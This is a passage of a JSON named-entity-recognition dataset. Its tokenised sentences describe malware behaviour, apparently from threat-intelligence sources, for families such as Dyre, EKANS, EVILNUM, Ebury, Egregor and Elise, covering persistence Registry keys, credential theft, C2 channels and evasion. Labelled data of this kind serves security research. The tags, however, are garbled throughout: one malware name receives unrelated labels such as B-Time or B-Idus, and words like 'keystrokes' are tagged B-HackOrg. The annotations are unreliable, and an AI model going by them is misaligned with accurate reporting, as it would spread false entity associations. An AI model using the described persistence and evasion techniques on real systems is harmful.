"adding", - "a", - "new", - "task", - "in", - "the", - "task", - "scheduler", - "to", - "run", - "every", - "minute." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dyre", - "has", - "the", - "ability", - "to", - "identify", - "installed", - "programs", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dyre", - "has", - "been", - "delivered", - "with", - "encrypted", - "resources", - "and", - "must", - "be", - "unpacked", - "for", - "execution." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dyre", - "can", - "detect", - "sandbox", - "analysis", - "environments", - "by", - "inspecting", - "the", - "process", - "list", - "and", - "Registry." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dyre", - "has", - "the", - "ability", - "to", - "identify", - "the", - "computer", - "name,", - "OS", - "version,", - "and", - "hardware", - "configuration", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dyre", - "has", - "the", - "ability", - "to", - "identify", - "network", - "settings", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dyre", - "has", - "the", - "ability", - "to", - "identify", - "the", - "users", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dyre", - "has", - "the", - "ability", - "to", - "identify", - "running", - "services", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dyre", - "uses", - "HTTPS", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dyre", - "registers", - "itself", - "as", - "a", - "service", - "by", - "adding", - "several", - "Registry", - "keys." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "I-Way", - "B-Features", - "B-Way" - ] - }, - { - "tokens": [ - "ECCENTRICBANDWAGON", - "can", - "delete", - "log", - "files", - "generated", - "from", - "the", - "malware", - "stored", - "at", - "<code>C:\\windows\\temp\\tmp0207</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ECCENTRICBANDWAGON", - "can", - "capture", - "and", - "store", - "keystrokes." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Features", - "I-Features", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "ECCENTRICBANDWAGON", - "has", - "stored", - "keystrokes", - "and", - "screenshots", - "within", - "the", - "<code>%temp%\\GoogleChrome</code>,", - "<code>%temp%\\Downloads</code>,", - "and", - "<code>%temp%\\TrendMicroUpdate</code>", - "directories." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ECCENTRICBANDWAGON", - "has", - "encrypted", - "strings", - "with", - "RC4." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ECCENTRICBANDWAGON", - "can", - "capture", - "screenshots", - "and", - "store", - "them", - "locally." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ECCENTRICBANDWAGON", - "can", - "use", - "cmd", - "to", - "execute", - "commands", - "on", - "a", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "EKANS", - "uses", - "standard", - "encryption", - "library", - "functions", - "to", - "encrypt", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "EKANS", - "stops", - "processes", - "related", - "to", - "security", - "and", - "management", - "software." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "EKANS", - "removes", - "backups", - "of", - "Volume", - "Shadow", - "Copies", - "to", - "disable", - "any", - "restoration", - "capabilities." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-HackOrg", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "EKANS", - "has", - "been", - "disguised", - "as", - "<code>update.exe</code>", - "to", - "appear", - "as", - "a", - "valid", - "executable." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "EKANS", - "uses", - "encoded", - "strings", - "in", - "its", - "process", - "kill", - "list." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "EKANS", - "looks", - "for", - "processes", - "from", - "a", - "hard-coded", - "list." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "EKANS", - "stops", - "database,", - "data", - "backup", - "solution,", - "antivirus,", - "and", - "ICS-related", - "processes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "EKANS", - "can", - "determine", - "the", - "domain", - "of", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "EKANS", - "can", - "use", - "Windows", - "Mangement", - "Instrumentation", - "(WMI)", - "calls", - "to", - "execute", - "operations." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Exp", - "B-SecTeam", - "B-SecTeam", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ELMER", - "is", - "capable", - "of", - "performing", - "directory", - "listings." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "ELMER", - "is", - "capable", - "of", - "performing", - "process", - "listings." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "ELMER", - "uses", - "HTTP", - "for", - "command", - "and", - "control." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "EVILNUM", - "can", - "upload", - "files", - "over", - "the", - "C2", - "channel", - "from", - "the", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "EVILNUM", - "has", - "a", - "function", - "called", - "\"DeleteLeftovers\"", - "to", - "remove", - "certain", - "artifacts", - "of", - "the", - "attack." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "B-OffAct" - ] - }, - { - "tokens": [ - "EVILNUM", - "can", - "download", - "and", - "upload", - "files", - "to", - "the", - "victim's", - "computer." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "EVILNUM", - "can", - "make", - "modifications", - "to", - "the", - "Regsitry", - "for", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "EVILNUM", - "has", - "used", - "a", - "one-way", - "communication", - "method", - "via", - "GitLab", - "and", - "Digital", - "Point", - "to", - "perform", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "EVILNUM", - "can", - "achieve", - "persistence", - "through", - "the", - "Registry", - "Run", - "key." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "EVILNUM", - "can", - "run", - "a", - "remote", - "scriptlet", - "that", - "drops", - "a", - "file", - "and", - "executes", - "it", - "via", - "regsvr32.exe." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "EVILNUM", - "can", - "execute", - "commands", - "and", - "scripts", - "through", - "rundll32." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "EVILNUM", - "can", - "search", - "for", - "anti-virus", - "products", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "EVILNUM", - "can", - "harvest", - "cookies", - "and", - "upload", - "them", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Features", - "I-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "EVILNUM", - "can", - "obtain", - "the", - "computer", - "name", - "from", - "the", - "victim's", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "EVILNUM", - "can", - "obtain", - "the", - "username", - "from", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "EVILNUM", - "has", - "changed", - "the", - "creation", - "date", - "of", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "EVILNUM", - "has", - "used", - "the", - "Windows", - "Management", - "Instrumentation", - "(WMI)", - "tool", - "to", - "enumerate", - "infected", - "machines." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "B-Way", - "O", - "O", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Ebury", - "can", - "automatically", - "exfiltrate", - "gathered", - "SSH", - "credentials." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ebury", - "has", - "installed", - "a", - "self-signed", - "RPM", - "package", - "mimicking", - "the", - "original", - "system", - "package", - "on", - "RPM", - "based", - "systems." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ebury", - "has", - "been", - "embedded", - "into", - "modified", - "OpenSSH", - "binaries", - "to", - "gain", - "persistent", - "access", - "to", - "SSH", - "credential", - "information." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "Ebury", - "has", - "used", - "DNS", - "requests", - "over", - "UDP", - "port", - "53", - "for", - "C2." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ebury", - "has", - "verified", - "C2", - "domain", - "ownership", - "by", - "decrypting", - "the", - "TXT", - "record", - "using", - "an", - "embedded", - "RSA", - "public", - "key." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Ebury", - "can", - "disable", - "SELinux", - "Role-Based", - "Access", - "Control", - "and", - "deactivate", - "PAM", - "modules." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ebury", - "has", - "used", - "a", - "DGA", - "to", - "generate", - "a", - "domain", - "name", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ebury", - "has", - "injected", - "its", - "dynamic", - "library", - "into", - "descendent", - "processes", - "of", - "sshd", - "via", - "LD_PRELOAD." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Ebury", - "can", - "exfiltrate", - "SSH", - "credentials", - "through", - "custom", - "DNS", - "queries." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-SamFile", - "B-SamFile", - "B-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ebury", - "has", - "implemented", - "a", - "fallback", - "mechanism", - "to", - "begin", - "using", - "a", - "DGA", - "when", - "the", - "attacker", - "hasn't", - "connected", - "to", - "the", - "infected", - "system", - "for", - "three", - "days." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ebury", - "can", - "list", - "directory", - "entries." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Ebury", - "can", - "hook", - "logging", - "functions", - "so", - "that", - "nothing", - "from", - "the", - "backdoor", - "gets", - "sent", - "to", - "the", - "logging", - "facility." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ebury", - "can", - "intercept", - "private", - "keys", - "using", - "a", - "trojanized", - "<code>ssh-add</code>", - "function." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ebury", - "has", - "obfuscated", - "its", - "strings", - "with", - "a", - "simple", - "XOR", - "encryption", - "with", - "a", - "static", - "key." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ebury", - "can", - "deactivate", - "PAM", - "modules", - "to", - "tamper", - "with", - "the", - "sshd", - "configuration." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ebury", - "has", - "intercepted", - "unencrypted", - "private", - "keys", - "as", - "well", - "as", - "private", - "key", - "pass-phrases." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ebury", - "has", - "used", - "Python", - "to", - "implement", - "its", - "DGA." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ebury", - "has", - "used", - "user", - "mode", - "rootkit", - "techniques", - "to", - "remain", - "hidden", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ebury", - "has", - "encoded", - "C2", - "traffic", - "in", - "hexadecimal", - "format." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ebury", - "has", - "encrypted", - "C2", - "traffic", - "using", - "the", - "client", - "IP", - "address,", - "then", - "encoded", - "it", - "as", - "a", - "hexadecimal", - "string." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ecipekac", - "has", - "used", - "a", - "valid,", - "legitimate", - "digital", - "signature", - "to", - "evade", - "detection." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ecipekac", - "can", - "abuse", - "the", - "legitimate", - "application", - "policytool.exe", - "to", - "load", - "a", - "malicious", - "DLL." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ecipekac", - "has", - "the", - "ability", - "to", - "decrypt", - "fileless", - "loader", - "modules." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ecipekac", - "can", - "download", - "additional", - "payloads", - "to", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ecipekac", - "can", - "use", - "XOR,", - "AES,", - "and", - "DES", - "to", - "encrypt", - "loader", - "shellcode." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Egregor", - "has", - "used", - "BITSadmin", - "to", - "download", - "and", - "execute", - "malicious", - "DLLs." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Egregor", - "has", - "used", - "DLL", - "side-loading", - "to", - "execute", - "its", - "payload." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "B-Way", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Egregor", - "can", - "encrypt", - "all", - "non-system", - "files", - "using", - "a", - "hybrid", - "AES-RSA", - "algorithm", - "prior", - "to", - "displaying", - "a", - "ransom", - "note." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Egregor", - "can", - "collect", - "any", - "files", - "found", - "in", - "the", - "enumerated", - "drivers", - "before", - "sending", - "it", - "to", - "its", - "C2", - "channel." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Egregor", - "has", - "been", - "decrypted", - "before", - "execution." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Egregor", - "has", - "disabled", - "Windows", - "Defender", - "to", - "evade", - "protections." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Egregor", - "can", - "conduct", - "Active", - "Directory", - "reconnaissance", - "using", - "tools", - "such", - "as", - "Sharphound", - "or", - "AdFind." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Egregor", - "can", - "modify", - "the", - "GPO", - "to", - "evade", - "detection." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Egregor", - "has", - "the", - "ability", - "to", - "download", - "files", - "from", - "its", - "C2", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Egregor", - "has", - "masqueraded", - "the", - "svchost.exe", - "process", - "to", - "exfiltrate", - "data." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Egregor", - "has", - "used", - "the", - "Windows", - "API", - "to", - "make", - "detection", - "more", - "difficult." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Egregor", - "has", - "used", - "an", - "encoded", - "PowerShell", - "command", - "by", - "a", - "service", - "created", - "by", - "Cobalt", - "Strike", - "for", - "lateral", - "movement." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-SecTeam", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Egregor", - "can", - "inject", - "its", - "payload", - "into", - "iexplore.exe", - "process." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Egregor", - "has", - "used", - "regsvr32.exe", - "to", - "execute", - "malicious", - "DLLs." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Egregor", - "has", - "checked", - "for", - "the", - "LogMein", - "event", - "log", - "in", - "an", - "attempt", - "to", - "encrypt", - "files", - "in", - "remote", - "machines." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Egregor", - "has", - "used", - "rundll32", - "during", - "execution." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Egregor's", - "payloads", - "are", - "custom-packed,", - "archived", - "and", - "encrypted", - "to", - "prevent", - "analysis." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Egregor", - "can", - "perform", - "a", - "language", - "check", - "of", - "the", - "infected", - "system", - "and", - "can", - "query", - "the", - "CPU", - "information", - "(cupid)." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Egregor", - "can", - "enumerate", - "all", - "connected", - "drives." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Egregor", - "has", - "used", - "tools", - "to", - "gather", - "information", - "about", - "users." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O" - ] - }, - { - "tokens": [ - "Egregor", - "contains", - "functionality", - "to", - "query", - "the", - "local/system", - "time." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Egregor", - "can", - "perform", - "a", - "long", - "sleep", - "(greater", - "than", - "or", - "equal", - "to", - "3", - "minutes)", - "to", - "evade", - "detection." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Egregor", - "has", - "used", - "multiple", - "anti-analysis", - "and", - "anti-sandbox", - "techniques", - "to", - "prevent", - "automated", - "analysis", - "by", - "sandboxes." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Egregor", - "has", - "communicated", - "with", - "its", - "C2", - "servers", - "via", - "HTTPS", - "protocol." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Egregor", - "has", - "used", - "batch", - "files", - "for", - "execution", - "and", - "can", - "launch", - "Internet", - "Explorer", - "from", - "cmd.exe." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "B-Way", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Elise", - "injects", - "DLL", - "files", - "into", - "iexplore.exe." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Elise", - "encrypts", - "several", - "of", - "its", - "files,", - "including", - "configuration", - "files." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "Elise", - "is", - "capable", - "of", - "launching", - "a", - "remote", - "shell", - "on", - "the", - "host", - "to", - "delete", - "itself." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "variant", - "of", - "Elise", - "executes", - "<code>dir", - "C:\\progra~1</code>", - "when", - "initially", - "run." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Elise", - "can", - "download", - "additional", - "files", - "from", - "the", - "C2", - "server", - "for", - "execution." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Elise", - "executes", - "<code>net", - "user</code>", - "after", - "initial", - "communication", - "is", - "made", - "to", - "the", - "remote", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Elise", - "creates", - "a", - "file", - "in", - "<code>AppData\\Local\\Microsoft\\Windows\\Explorer</code>", - "and", - "stores", - "all", - "harvested", - "data", - "in", - "that", - "file." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "If", - "installing", - "itself", - "as", - "a", - "service", - "fails,", - "Elise", - "instead", - "writes", - "itself", - "as", - "a", - "file", - "named", - "svchost.exe", - "saved", - "in", - "%APPDATA%\\Microsoft\\Network." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Elise", - "enumerates", - "processes", - "via", - "the", - "<code>tasklist</code>", - "command." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "If", - "establishing", - "persistence", - "by", - "installation", - "as", - "a", - "new", - "service", - "fails,", - "one", - "variant", - "of", - "Elise", - "establishes", - "persistence", - "for", - "the", - "created", - ".exe", - "file", - "by", - "setting", - "the", - "following", - "Registry", - "key:", - "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\svchost", - ":", - "%APPDATA%\\Microsoft\\Network\\svchost.exe</code>.", - "Other", - "variants", - "have", - "set", - "the", - "following", - "Registry", - "keys", - "for", - "persistence:", - "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\imejp", - ":", - "[self]</code>", - "and", - "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\IAStorD</code>." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "After", - "copying", - "itself", - "to", - "a", - "DLL", - "file,", - "a", - "variant", - "of", - "Elise", - "calls", - "the", - "DLL", - "file", - "using", - "rundll32.exe." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "I-SamFile", - 